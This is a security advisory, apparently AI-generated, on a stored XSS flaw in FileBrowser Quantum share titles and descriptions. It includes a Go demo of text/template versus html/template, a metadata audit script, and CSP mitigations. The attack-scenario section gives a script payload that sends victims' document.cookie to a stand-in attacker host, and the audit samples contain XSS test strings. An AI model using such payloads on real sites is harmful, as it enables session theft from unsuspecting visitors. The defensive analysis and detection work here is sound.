CVE-2026-30934 Overview
CVE-2026-30934 is a Stored Cross-Site Scripting (XSS) vulnerability affecting FileBrowser Quantum, a free, self-hosted, web-based file manager. The vulnerability exists in share metadata fields such as title and description, which are rendered into HTML on the public share URL (/public/share/<hash>) without proper context-aware escaping. This flaw allows attackers to inject malicious scripts that execute when victims visit a crafted share URL.
The root cause stems from the server's use of Go's text/template instead of html/template for rendering share pages, bypassing automatic HTML escaping mechanisms and enabling script execution in the victim's browser context.
Critical Impact
Authenticated attackers can execute arbitrary JavaScript in the browsers of users who access shared file links, potentially leading to session hijacking, credential theft, or further malware distribution.
Affected Products
- FileBrowser Quantum versions prior to 1.3.1-beta
- FileBrowser Quantum versions prior to 1.2.2-stable
Discovery Timeline
- 2026-03-10 - CVE-2026-30934 published to NVD
- 2026-03-11 - Last updated in NVD database
Technical Details for CVE-2026-30934
Vulnerability Analysis
This Stored XSS vulnerability (CWE-79) allows authenticated users with share creation privileges to inject malicious JavaScript into share metadata fields. The attack is network-based and requires low privileges—any authenticated user capable of creating file shares can exploit it. However, successful exploitation requires user interaction, specifically a victim visiting the malicious share URL.
This vulnerability carries a changed scope in CVSS terms, which is what makes it particularly concerning: the injected script executes in the context of any victim's browser session, not the attacker's. This enables cross-user attacks in which the attacker can steal session tokens, redirect users to phishing pages, or perform actions on behalf of the victim within the FileBrowser Quantum application.
Root Cause
The vulnerability originates from an insecure template rendering implementation in FileBrowser Quantum's Go codebase. The application uses Go's text/template package to render share pages instead of the html/template package. While text/template provides general-purpose text templating, it does not perform HTML-aware contextual escaping. In contrast, html/template automatically escapes content based on the HTML context (attributes, script blocks, CSS, etc.), preventing XSS attacks by default.
When share metadata (title, description) containing HTML or JavaScript is rendered into the /public/share/<hash> page, the text/template engine outputs the content verbatim, allowing any embedded <script> tags or event handlers to execute.
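To make the root cause concrete, the following Go program is an added example, not FileBrowser Quantum's own code or share page: it parses one minimal, constructed share template with both text/template and html/template and renders the same constructed metadata through each. The Share type, the template and the sample payload are assumptions made for this example. It goes one step beyond the text above by placing the title in three contexts (element text, quoted attribute, JavaScript value) so the per-context escaping that html/template selects is visible in the output.

```go
package main

import (
	"bytes"
	"fmt"
	htmltmpl "html/template"
	texttmpl "text/template"
)

// Share holds the user-controlled metadata fields named in the advisory.
// This struct and the template below are constructed for this example; they
// are not FileBrowser Quantum's own types or share page.
type Share struct {
	Title       string
	Description string
}

// sharePage is a minimal stand-in for a public share page. It places the
// title in three different contexts (element text, quoted attribute,
// JavaScript value) because each needs a different escaper. The same source
// is parsed by both packages, so the escaper is the only difference.
const sharePage = `<h1 title="{{.Title}}">{{.Title}}</h1>
<p>{{.Description}}</p>
<script>var shareTitle = {{.Title}};</script>
`

// RenderWithTextTemplate reproduces the vulnerable pattern: text/template
// substitutes the fields verbatim, so any markup stored in Title or
// Description is emitted as live HTML and runs in the visitor's browser.
func RenderWithTextTemplate(s Share) (string, error) {
	t, err := texttmpl.New("share").Parse(sharePage)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, s); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// RenderWithHTMLTemplate is the fixed pattern: html/template analyses the
// template at parse time and attaches a context-aware escaper to each action.
func RenderWithHTMLTemplate(s Share) (string, error) {
	t, err := htmltmpl.New("share").Parse(sharePage)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, s); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// SamplePayload is a constructed, benign stand-in for stored share metadata
// that contains markup. The description shows that ordinary characters such
// as & and quotes are escaped too: after the fix they are rendered as text,
// which is the intended behaviour for a plain-text title or description.
func SamplePayload() Share {
	return Share{
		Title:       "<script>alert('xss')</script>",
		Description: `Report & "notes" <b>bold</b>`,
	}
}

func main() {
	s := SamplePayload()
	for _, r := range []struct {
		name   string
		render func(Share) (string, error)
	}{
		{"text/template (vulnerable)", RenderWithTextTemplate},
		{"html/template (fixed)", RenderWithHTMLTemplate},
	} {
		out, err := r.render(s)
		if err != nil {
			fmt.Println(r.name, "error:", err)
			continue
		}
		fmt.Printf("--- %s ---\n%s\n", r.name, out)
	}
}
```

Run it with go run: the text/template output carries the script tag verbatim in all three positions, while html/template emits &lt;script&gt; in the element-text and attribute positions and a JSON string literal with \u003c inside the script block, so nothing the visitor's browser sees is parsed as markup. Note that the fix is purely about output encoding: the stored metadata is unchanged, which is why the audit of existing shares recommended below still matters after upgrading.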
Attack Vector
The attack requires an authenticated user to create or modify a file share with malicious JavaScript embedded in metadata fields. When an unauthenticated or authenticated victim navigates to the public share URL, the injected script executes in their browser.
A typical attack scenario involves an attacker setting a share title or description to contain JavaScript code such as <script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>. When victims access the share link, this script executes, exfiltrating their session cookies to the attacker's server.
The stored nature of this XSS makes it particularly dangerous, as the malicious payload persists on the server and affects all users who visit the compromised share link. For detailed technical analysis, refer to the GitHub Security Advisory GHSA-r633-fcgp-m532.
Detection Methods for CVE-2026-30934
Indicators of Compromise
- Presence of HTML tags or JavaScript in share metadata fields (title, description) in the FileBrowser Quantum database
- Unusual outbound network requests originating from users' browsers after visiting share URLs
- Reports from users about unexpected redirects or behavior when accessing shared file links
- Server logs showing access to /public/share/<hash> endpoints followed by unusual client-side activity
Detection Strategies
- Review existing share metadata in the FileBrowser Quantum database for suspicious HTML or script content
- Implement Content Security Policy (CSP) headers with a reporting directive (report-uri or report-to) so that inline script execution attempts are both blocked and logged
- Monitor web application firewall (WAF) logs for XSS patterns in requests to share-related endpoints
- Deploy browser-based monitoring for exfiltration attempts via document.cookie access
Monitoring Recommendations
- Enable verbose logging for share creation and modification operations
- Set up alerts for share metadata containing HTML special characters (<, >, ", ', &)
- Monitor for unusual patterns in share access, particularly shares from accounts that rarely create shares but whose shares receive high view counts
- Implement real-time browser telemetry if available to detect script injection behavior
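As an added example of the audit and alerting items above (reviewing stored share metadata for script content, and alerting on HTML special characters in share metadata), the following Go program is not part of the advisory or of FileBrowser Quantum. It scans a constructed export of share records, whose layout, hashes and owners are assumptions made for this example rather than the application's real storage schema, and classifies each title and description. It ranks the stronger signals (a tag opener, an inline event handler, a javascript: URL) above the bare special-character check so that a harmless ampersand or apostrophe produces a lower-priority finding than stored markup.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// ShareRecord stands in for one stored share's metadata. The field names
// follow the advisory; the record layout is constructed for this example and
// is not FileBrowser Quantum's own storage schema.
type ShareRecord struct {
	Hash        string
	Owner       string
	Title       string
	Description string
}

// Finding is one flagged field together with the reason it was flagged.
type Finding struct {
	Hash   string
	Field  string
	Reason string
}

var (
	// A tag opener as a browser tokenises it: "<" immediately followed by a
	// letter, "</" for an end tag, or "<!" for a comment or doctype.
	// "a < b" does not match, which keeps ordinary prose out of this bucket.
	tagPattern = regexp.MustCompile(`(?i)</?[a-z!]`)
	// An inline event-handler attribute such as onerror= or onload=.
	handlerPattern = regexp.MustCompile(`(?i)\bon[a-z]+\s*=`)
	// A javascript: URL, which executes when used as an href or src.
	schemePattern = regexp.MustCompile(`(?i)javascript\s*:`)
)

// Classify returns why a value is suspicious, or "" when it looks clean.
// Markup and handler patterns are checked before the weaker special-character
// signal so the finding reflects the strongest evidence; a bare & or quote
// in a title is usually benign and deserves a lower-priority alert.
func Classify(v string) string {
	switch {
	case tagPattern.MatchString(v):
		return "html tag"
	case handlerPattern.MatchString(v):
		return "event handler"
	case schemePattern.MatchString(v):
		return "javascript: scheme"
	case strings.ContainsAny(v, `<>"'&`):
		return "html special characters"
	}
	return ""
}

// AuditShares scans each record's title and description and returns one
// Finding per suspicious field, in record order (title before description).
func AuditShares(records []ShareRecord) []Finding {
	var out []Finding
	for _, r := range records {
		for _, f := range []struct{ name, value string }{
			{"title", r.Title},
			{"description", r.Description},
		} {
			if reason := Classify(f.value); reason != "" {
				out = append(out, Finding{Hash: r.Hash, Field: f.name, Reason: reason})
			}
		}
	}
	return out
}

// SampleRecords is a constructed export of share metadata; the hashes,
// owners and values are made up for this example.
func SampleRecords() []ShareRecord {
	return []ShareRecord{
		{Hash: "a1b2c3", Owner: "alice", Title: "Q3 figures", Description: "Spreadsheet for finance"},
		{Hash: "d4e5f6", Owner: "mallory", Title: "<script>alert(1)</script>", Description: "photos"},
		{Hash: "07a8b9", Owner: "mallory", Title: "gallery onmouseover=alert(1)", Description: "photos"},
		{Hash: "c0d1e2", Owner: "bob", Title: "Tom & Jerry's notes", Description: "a < b comparison"},
		{Hash: "f3a4b5", Owner: "mallory", Title: "Click me", Description: "see javascript:alert(1)"},
	}
}

func main() {
	for _, f := range AuditShares(SampleRecords()) {
		fmt.Printf("share %s: %-11s %s\n", f.Hash, f.Field, f.Reason)
	}
}
```

In practice the records would come from a database export or the application's share-listing API rather than a literal slice; the "html special characters" bucket is the one the alerting rule above fires on and is the one that needs human triage, since titles such as "Tom & Jerry's notes" are legitimate. The Owner field is kept so that findings can be correlated with the share-creation logs recommended above.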
How to Mitigate CVE-2026-30934
Immediate Actions Required
- Upgrade FileBrowser Quantum to version 1.2.2-stable or 1.3.1-beta immediately
- Audit existing shares for potentially malicious metadata content and sanitize or remove compromised entries
- Implement Content Security Policy (CSP) headers to mitigate impact while patching is in progress
- Temporarily disable public share functionality if immediate patching is not feasible
Patch Information
The FileBrowser Quantum development team has addressed this vulnerability in two releases:
- Stable Release: Version 1.2.2-stable - Recommended for production environments
- Beta Release: Version 1.3.1-beta - Includes additional features alongside the security fix
The patch replaces the use of text/template with html/template for rendering share pages, ensuring proper context-aware HTML escaping of all user-supplied content.
Workarounds
- Deploy a reverse proxy with XSS filtering rules in front of FileBrowser Quantum
- Implement server-side input validation to strip HTML tags from share metadata fields
- Add Content-Security-Policy headers to restrict inline script execution: Content-Security-Policy: script-src 'self'
- Restrict share creation privileges to trusted users only until patching is complete
# Example nginx configuration to add CSP headers in front of FileBrowser Quantum
location / {
    # nginx does not merge add_header across levels: once a location sets any
    # add_header, headers from the enclosing server/http block are dropped for
    # it, so every required header is listed here. "always" also covers 4xx/5xx.
    add_header Content-Security-Policy "script-src 'self'; object-src 'none';" always;
    add_header X-Content-Type-Options "nosniff" always;
    # Legacy: Chrome and Edge removed the XSS auditor this header controlled and
    # Firefox never implemented it; the CSP line above is the effective control.
    add_header X-XSS-Protection "1; mode=block" always;
    # Check the application's own UI still loads: 'self' also blocks inline scripts.
    proxy_pass http://filebrowser:8080;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

